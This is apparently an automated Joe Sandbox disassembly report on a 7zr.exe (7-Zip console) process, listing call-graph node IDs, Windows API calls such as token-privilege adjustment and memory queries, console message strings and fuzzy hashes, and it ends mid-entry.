75587->75588 75589 1b99dc 75588->75589 75790 1a7b48 75589->75790 75591 1b9a29 75819 1bb96d _CxxThrowException 75591->75819 75593 1b9a30 75820 1a7018 8 API calls 2 library calls 75593->75820 75595 1b9a7c 75821 1addb5 6 API calls 2 library calls 75595->75821 75597 1b9a66 _CxxThrowException 75597->75595 75598 1b9aa6 75599 1b9aaa _CxxThrowException 75598->75599 75609 1b9ac0 75598->75609 75599->75609 75600 1b9a37 75600->75595 75600->75597 75601 1b9b3a 75825 181fa0 fputc 75601->75825 75604 1b9bfa _CxxThrowException 75623 1b9be6 75604->75623 75605 1b9b63 fputs 75826 181fa0 fputc 75605->75826 75608 1b9b79 strlen strlen 75610 1b9baa fputs fputc 75608->75610 75611 1b9e25 75608->75611 75609->75601 75609->75604 75822 1a7dd7 7 API calls 2 library calls 75609->75822 75823 1bc077 6 API 
calls 75609->75823 75824 181e40 free 75609->75824 75610->75623 75834 181fa0 fputc 75611->75834 75614 1b9e2c fputs 75835 181fa0 fputc 75614->75835 75616 1b9f0c 75840 181fa0 fputc 75616->75840 75620 1bb67d 12 API calls 75620->75623 75621 1b9f13 fputs 75622 1b9e42 75622->75616 75656 1b9ee0 fputs 75622->75656 75836 1bb650 fputc fputs fputs fputc 75622->75836 75837 1821d8 fputs 75622->75837 75838 1bbde4 fputc fputs 75622->75838 75623->75610 75623->75611 75623->75620 75627 182e04 2 API calls 75623->75627 75641 1b9d2a fputs 75623->75641 75645 1b9d5f fputs 75623->75645 75646 1831e5 malloc _CxxThrowException free _CxxThrowException 75623->75646 75827 1821d8 fputs 75623->75827 75828 18315e malloc _CxxThrowException free _CxxThrowException 75623->75828 75829 183221 malloc _CxxThrowException free _CxxThrowException 75623->75829 75830 181089 malloc _CxxThrowException free _CxxThrowException 75623->75830 75832 181fa0 fputc 75623->75832 75833 181e40 free 75623->75833 75627->75623 75831 1821d8 fputs 75641->75831 75645->75623 75646->75623 75839 181fa0 fputc 75656->75839 75664 1bb5bc fputs 75663->75664 75665 1b994a 75663->75665 75859 181fa0 fputc 75664->75859 75665->75582 75807 181fb3 75665->75807 75667 1bb5d5 75667->75665 75668 1bb5d9 fputs 75667->75668 75668->75665 75670 191f6c 75669->75670 75671 191f4f 75669->75671 75860 1929eb 75670->75860 75902 1a1d73 5 API calls __EH_prolog 75671->75902 75674 191f5e _CxxThrowException 75674->75670 75677 191fbc 75681 191fda 75677->75681 75682 182fec 3 API calls 75677->75682 75678 191fa3 75678->75677 75680 184fc0 5 API calls 75678->75680 75679 191f95 _CxxThrowException 75679->75678 75680->75677 75683 192022 wcscmp 75681->75683 75692 192036 75681->75692 75682->75681 75684 1920af 75683->75684 75683->75692 75904 1a1d73 5 API calls __EH_prolog 75684->75904 75686 1920a9 75905 19393c 6 API calls 2 library calls 75686->75905 75687 1920be _CxxThrowException 75687->75692 75689 1920f4 75906 19393c 6 API calls 2 library calls 75689->75906 75691 192108 
75693 192135 75691->75693 75907 192e04 62 API calls 2 library calls 75691->75907 75692->75686 75695 19219a 75692->75695 75700 192159 75693->75700 75908 192e04 62 API calls 2 library calls 75693->75908 75909 1a1d73 5 API calls __EH_prolog 75695->75909 75698 1921a9 _CxxThrowException 75698->75700 75699 19227f 75865 192aa9 75699->75865 75700->75699 75702 192245 75700->75702 75910 1a1d73 5 API calls __EH_prolog 75700->75910 75705 182fec 3 API calls 75702->75705 75706 19225c 75705->75706 75706->75699 75911 1a1d73 5 API calls __EH_prolog 75706->75911 75707 1922d9 75710 192302 75707->75710 75712 182fec 3 API calls 75707->75712 75708 192237 _CxxThrowException 75708->75702 75709 182fec 3 API calls 75709->75707 75883 184fc0 75710->75883 75712->75710 75714 192271 _CxxThrowException 75714->75699 75717 192322 75718 1926c6 75717->75718 75726 1923a1 75717->75726 75719 1928ce 75718->75719 75720 192700 75718->75720 75924 1a1d73 5 API calls __EH_prolog 75718->75924 75721 19293a 75719->75721 75731 1928d5 75719->75731 75925 1932ec 14 API calls 2 library calls 75720->75925 75724 19293f 75721->75724 75725 1929a5 75721->75725 75942 184eec 16 API calls 75724->75942 75728 1929ae _CxxThrowException 75725->75728 75781 19264d 75725->75781 75734 19247a wcscmp 75726->75734 75751 19248e 75726->75751 75727 1926f2 _CxxThrowException 75727->75720 75729 192713 75926 193a29 75729->75926 75731->75781 75941 1a1d73 5 API calls __EH_prolog 75731->75941 75733 19294c 75943 184ea1 8 API calls 75733->75943 75737 1924cf wcscmp 75734->75737 75734->75751 75740 1924ef wcscmp 75737->75740 75737->75751 75743 19250f 75740->75743 75740->75751 75741 192953 75744 184fc0 5 API calls 75741->75744 75742 192920 _CxxThrowException 75742->75781 75915 1a1d73 5 API calls __EH_prolog 75743->75915 75744->75781 75747 19251e _CxxThrowException 75750 19252c 75747->75750 75748 1927cf 75752 192880 75748->75752 75755 19281f 75748->75755 75937 1a1d73 5 API calls __EH_prolog 75748->75937 75749 182fec 3 API calls 75753 1927a9 

                          Control-flow Graph

                          [Control-flow graph of the function at 189313-189398 (GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, CloseHandle); the executed/not-executed block graph is not reproduced in text form.]
                          APIs
                          • GetCurrentProcess.KERNEL32(00000020,00191EC5,?,7597AB50,?,?,?,?,00191EC5,00191CEF), ref: 00189329
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00191EC5,00191CEF), ref: 00189330
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00189342
                          • AdjustTokenPrivileges.KERNELBASE(00191EC5,00000000,?,00000000,00000000,00000000), ref: 00189368
                          • GetLastError.KERNEL32 ref: 00189372
                          • CloseHandle.KERNELBASE(00191EC5,?,?,?,?,00191EC5,00191CEF), ref: 00189388
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                          • String ID: SeRestorePrivilege
                          • API String ID: 3398352648-1684392131
                          • Opcode ID: c84c532d451158b433ad4b0e6d5e594770f8ede8f9dc6750426a8f7e9c3e0bf0
                          • Instruction ID: 27be162858712f7f425bf4d2cb3b812f7e40492cfcaa849bacc5dbc2ca727b1b
                          • Opcode Fuzzy Hash: c84c532d451158b433ad4b0e6d5e594770f8ede8f9dc6750426a8f7e9c3e0bf0
                          • Instruction Fuzzy Hash: C1016D76945218BBCB206BF1AC4DBEE7F7CAF06340F181164A942E2190D7758709DBA0

                          Control-flow Graph

                          [Control-flow graph of the function at 193d66-193dfe (GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, subcalls 21fb10 and 193e04); the executed/not-executed block graph is not reproduced in text form.]
                          APIs
                          • __EH_prolog.LIBCMT ref: 00193D6B
                          • GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193D7D
                          • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193D94
                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00193DB6
                          • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193DCB
                          • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00193DD5
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ProcessToken$AdjustCurrentErrorH_prologLastLookupOpenPrivilegePrivilegesValue
                          • String ID: SeSecurityPrivilege
                          • API String ID: 3475889169-2333288578
                          • Opcode ID: 34ecc5bb25bc718c3c79559af6a893085c5f2f7f97dbfc54020a909929249fcc
                          • Instruction ID: c8aef4063b1a804524120d58c767a78c8e6ccb8bbfcb8ce9e9619782c7a2970e
                          • Opcode Fuzzy Hash: 34ecc5bb25bc718c3c79559af6a893085c5f2f7f97dbfc54020a909929249fcc
                          • Instruction Fuzzy Hash: CC113CB1940119AFDF20AFE4EC99AFEFBBCFF04344F500529E422E2190D7709B098A60
                          APIs
                          • __EH_prolog.LIBCMT ref: 001C81F1
                            • Part of subcall function 001CF749: _CxxThrowException.MSVCRT(?,00234A58), ref: 001CF792
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionH_prologThrow
                          • String ID:
                          • API String ID: 461045715-3916222277
                          • Opcode ID: d74a48facf5f13b03f6e6ba7a3fc41c006009eae7c4a055b2423bb36d3cd6b19
                          • Instruction ID: 8aeea1961236055a97d69cc88e788ddeb562116f9d446e1308a057856e7bd74b
                          • Opcode Fuzzy Hash: d74a48facf5f13b03f6e6ba7a3fc41c006009eae7c4a055b2423bb36d3cd6b19
                          • Instruction Fuzzy Hash: 10926B71900259DFDB15DFA8C884FAEBBB1BF69304F24409DE805AB292CB74DE45CB61
                          APIs
                          • __EH_prolog.LIBCMT ref: 0018686D
                            • Part of subcall function 00186848: FindClose.KERNELBASE(00000000,?,00186880), ref: 00186853
                          • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 001868A5
                          • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 001868DE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: Find$FileFirst$CloseH_prolog
                          • String ID:
                          • API String ID: 3371352514-0
                          • Opcode ID: 1a0a1d88dd8b2db97165305ed8cf9b8b010c3363c6af3e2148342f5b991cfdb6
                          • Instruction ID: d6d3ff245e0079465af0babd053019cd50b0b361b02b26e0606b8c1742316469
                          • Opcode Fuzzy Hash: 1a0a1d88dd8b2db97165305ed8cf9b8b010c3363c6af3e2148342f5b991cfdb6
                          • Instruction Fuzzy Hash: BD119D31900209EBCB20FFA4D8969EDB7B9EF61324F204629E9A557191DB318F86DF40

                          Control-flow Graph

                          [Control-flow graph of the function at 1ba013-1bacb5 (the 7zCon.sfx summary/statistics printing routine: fputs, fputc and _CxxThrowException call sites); the executed/not-executed block graph is not reproduced in text form.]
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$ExceptionThrow
                          • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $`&$$p&$$N
                          • API String ID: 3665150552-950886213
                          • Opcode ID: c52578a100fc138cb331fac30f7c6ce5df39e2488007e9ffe06ed4b2f07e6e3c
                          • Instruction ID: fc769fd2c20ce044de66ee573dbe5a791a0d45220a5f62eb97f10083dc86f01c
                          • Opcode Fuzzy Hash: c52578a100fc138cb331fac30f7c6ce5df39e2488007e9ffe06ed4b2f07e6e3c
                          • Instruction Fuzzy Hash: C352AC31904258DFCF26EBA4C895BEDBBB5AF54304F14409AE44AA3291DB746F89CF11

                          Control-flow Graph

                          APIs
                          • fputs.MSVCRT(Scanning the drive for archives:), ref: 001BA43E
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputcfputs
                          • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $`&$$p&$$!"$N
                          • API String ID: 269475090-4035768851
                          • Opcode ID: bf53135e0f7e1ffc4d4d3de91843216ab4bfde8f45b6164147d07e398aeabed1
                          • Instruction ID: 51a131c7b49df8b6d985369d444bc21f7db458438955e0f23f277b10118c273c
                          • Opcode Fuzzy Hash: bf53135e0f7e1ffc4d4d3de91843216ab4bfde8f45b6164147d07e398aeabed1
                          • Instruction Fuzzy Hash: 14229D31904258DFDF2AEBA4C895BEDFBB6AF54304F10409AE44A63291DB756F88CF11

                          Control-flow Graph

                          APIs
                            • Part of subcall function 001BB5B1: fputs.MSVCRT ref: 001BB5CA
                            • Part of subcall function 001BB5B1: fputs.MSVCRT ref: 001BB5E1
                          • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 001B99BD
                          • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 001B99C4
                          • _CxxThrowException.MSVCRT(?,002355B8), ref: 001B9A77
                          • _CxxThrowException.MSVCRT(?,002355B8), ref: 001B9ABB
                            • Part of subcall function 00181FB3: __EH_prolog.LIBCMT ref: 00181FB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                          • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$p&$$p&$$N
                          • API String ID: 377453556-1899429407
                          • Opcode ID: f6ea03c2ffb154f3463cd11549a91a4c18e5241a13cbb31f77d59dd05142add9
                          • Instruction ID: 80a05a374cb94bc8dfdfc255b8a5db8ee0d2d94d1efbc74489d1ee08524004e9
                          • Opcode Fuzzy Hash: f6ea03c2ffb154f3463cd11549a91a4c18e5241a13cbb31f77d59dd05142add9
                          • Instruction Fuzzy Hash: 52229F71D00208DFDF15EFA4D886BEDBBB1EF58310F20005AE645A7292CB359A96CF61

                          Control-flow Graph

                          APIs
                          • __EH_prolog.LIBCMT ref: 00191AE3
                            • Part of subcall function 001813F5: __EH_prolog.LIBCMT ref: 001813FA
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191B2D
                          • _fileno.MSVCRT ref: 00191B3E
                          • _isatty.MSVCRT ref: 00191B47
                          • _fileno.MSVCRT ref: 00191B5D
                          • _isatty.MSVCRT ref: 00191B60
                          • _fileno.MSVCRT ref: 00191B73
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191CBB
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191DBD
                          • wcscmp.MSVCRT ref: 00191DCA
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191E04
                          • _isatty.MSVCRT ref: 00191B76
                            • Part of subcall function 001A1D73: __EH_prolog.LIBCMT ref: 001A1D78
                          • _CxxThrowException.MSVCRT(?,00236010), ref: 00191E2C
                          • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00191E3B
                          • SetProcessAffinityMask.KERNEL32(00000000), ref: 00191E42
                          • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00191E4C
                          Strings
                          • SeLockMemoryPrivilege, xrefs: 00191D28
                          • : ERROR : , xrefs: 00191E52
                          • Set process affinity mask: , xrefs: 00191D74
                          • unsupported value -stm, xrefs: 00191E19
                          • Unsupported switch postfix -bb, xrefs: 00191CA8
                          • Unsupported switch postfix for -slp, xrefs: 00191DF1
                          • Unsupported switch postfix -stm, xrefs: 00191DAA
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                          • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                          • API String ID: 1826148334-1115009270
                          • Opcode ID: 91cbcf67f0ee41d87e67c51718dfd1830b0fc3931a32515a17d5ab9725dcca3e
                          • Instruction ID: 52c9b2db91bac959ab09092ac4e5b9574d25a7aefadb18ca8e5207a437b77d75
                          • Opcode Fuzzy Hash: 91cbcf67f0ee41d87e67c51718dfd1830b0fc3931a32515a17d5ab9725dcca3e
                          • Instruction Fuzzy Hash: D2C1D231900246BFDF22EFB8C889BDDBBF5BF19304F148459E49997292C774AA95CB10

                          Control-flow Graph

                          APIs
                          • __EH_prolog.LIBCMT ref: 001B8017
                          • fputs.MSVCRT ref: 001B804D
                            • Part of subcall function 001B8341: __EH_prolog.LIBCMT ref: 001B8346
                            • Part of subcall function 001B8341: fputs.MSVCRT ref: 001B835B
                            • Part of subcall function 001B8341: fputs.MSVCRT ref: 001B8364
                          • fputs.MSVCRT ref: 001B807A
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                            • Part of subcall function 0018965D: VariantClear.OLEAUT32(?), ref: 0018967F
                          • SysFreeString.OLEAUT32(00000000), ref: 001B81AA
                          • fputs.MSVCRT ref: 001B81CD
                          • SysFreeString.OLEAUT32(00000000), ref: 001B8267
                          • SysFreeString.OLEAUT32(00000000), ref: 001B82B1
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                          • String ID: --$----$Path$Type$Warning: The archive is open with offset
                          • API String ID: 2889736305-3797937567
                          • Opcode ID: 172d1572b538b98de9c60d4ee9794a07a2c76d63c4630dedbdcfbdf7366c7b00
                          • Instruction ID: d55ba6b23ea03a923f4a06db02b213a6ebe6a1d2260d1251663532402c54e14a
                          • Opcode Fuzzy Hash: 172d1572b538b98de9c60d4ee9794a07a2c76d63c4630dedbdcfbdf7366c7b00
                          • Instruction Fuzzy Hash: 75917931A00605EFDB18EFA4DD85AEEB7B9FF58750F204169F412A7291DB70AD05CB60

                          Control-flow Graph

                          APIs
                          • __EH_prolog.LIBCMT ref: 001B676B
                          • EnterCriticalSection.KERNEL32(00242938), ref: 001B6781
                          • fputs.MSVCRT ref: 001B680B
                          • LeaveCriticalSection.KERNEL32(00242938), ref: 001B6944
                            • Part of subcall function 001BC7D7: fputs.MSVCRT ref: 001BC840
                          • fputs.MSVCRT ref: 001B6851
                            • Part of subcall function 00182201: fputs.MSVCRT ref: 0018221E
                          • fputs.MSVCRT ref: 001B68D9
                          • fputs.MSVCRT ref: 001B68F6
                            • Part of subcall function 00181FA0: fputc.MSVCRT ref: 00181FA7
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                          • String ID: v$8)$$8)$$Sub items Errors:
                          • API String ID: 2670240366-3854986774
                          • Opcode ID: 181bb5e047ed824b455c9e7d7b7deb10f4bdde999027bc68a15164d64f4d0081
                          • Instruction ID: 34a3239608f6fec2b12450b1f93c51650713fd02c0ea9aaaf1680a9482938425
                          • Opcode Fuzzy Hash: 181bb5e047ed824b455c9e7d7b7deb10f4bdde999027bc68a15164d64f4d0081
                          • Instruction Fuzzy Hash: 9F51CE32600700EFCB24AFA4D895AEAB7E2FFA4314F50442EE19A87261CB386D55CF40

                          Control-flow Graph

                          APIs
                          • __EH_prolog.LIBCMT ref: 001B635E
                          • fputs.MSVCRT ref: 001B645F
                            • Part of subcall function 001BC7D7: fputs.MSVCRT ref: 001BC840
                          • fputs.MSVCRT ref: 001B6547
                          • fputs.MSVCRT ref: 001B665F
                          • fputs.MSVCRT ref: 001B66AE
                            • Part of subcall function 00181F91: fflush.MSVCRT ref: 00181F93
                            • Part of subcall function 00181FB3: __EH_prolog.LIBCMT ref: 00181FB8
                            • Part of subcall function 00181E40: free.MSVCRT ref: 00181E44
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: fputs$H_prolog$fflushfree
                          • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                          • API String ID: 1750297421-1898165966
                          • Opcode ID: 66186c7f06c69b1373a62635ff70d16a7cb8f00787b2013bd81247d7e2429988
                          • Instruction ID: 6c9386aa057058c425cb4d604b8d9d63b0d62992d91ca20903d0167b2a39ceb2
                          • Opcode Fuzzy Hash: 66186c7f06c69b1373a62635ff70d16a7cb8f00787b2013bd81247d7e2429988
                          • Instruction Fuzzy Hash: B4B18B31601B019FDB24EF60C9A1BEAB7F2BF64304F04452DE65A87292CB78AD59CF50

                          Control-flow Graph (function at 189c8f; rendered graph not reproduced, legend: Executed / Not Executed)
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00189CB3
                          • GetProcAddress.KERNEL32(00000000), ref: 00189CBA
                          • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00189CC8
                          • GlobalMemoryStatus.KERNEL32(?), ref: 00189CFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                          • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                          • API String ID: 180289352-802862622
                          • Opcode ID: 7037e647b7d56291866f771a204e1dcbf45a5fd70f42e6067fd282fa19418eb8
                          • Instruction ID: 940991f24f0ccaefe6c79266e606da8b8dd0c307ac3d82d2d8372ec802b4991f
                          • Opcode Fuzzy Hash: 7037e647b7d56291866f771a204e1dcbf45a5fd70f42e6067fd282fa19418eb8
                          • Instruction Fuzzy Hash: 211117B0900209ABDF24EFE4E899BADBBF5BF04705F644418E446A7240D779EA84CF54

                          Control-flow Graph (function at 1cf1b2; rendered graph not reproduced, legend: Executed / Not Executed)
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
                          • Associated: 00000009.00000002.1889711325.0000000000180000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889835658.000000000022C000.00000002.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889877147.0000000000242000.00000004.00000001.01000000.0000000A.sdmp
                          • Associated: 00000009.00000002.1889905530.000000000024B000.00000002.00000001.01000000.0000000A.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_180000_7zr.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: C#$C#
                          • API String ID: 3519838083-2277949161
                          • Opcode ID: 7f6294665eb9d02f9a22bcccf2354bde45e5a56ee20be3687756f866a37e88b4
                          • Instruction ID: e7b9f0bf3bc9ecb01e3dc47a71564157e30d5788ce9f5d2c81a4e41a1d44cbba
                          • Opcode Fuzzy Hash: 7f6294665eb9d02f9a22bcccf2354bde45e5a56ee20be3687756f866a37e88b4
                          • Instruction Fuzzy Hash: B6517076A00205ABDB14DFA4C884FBEB3B6FFA8354F15842DE901A7241D774E946CB60

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.1889741846.0000000000181000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00180000, based on PE: true
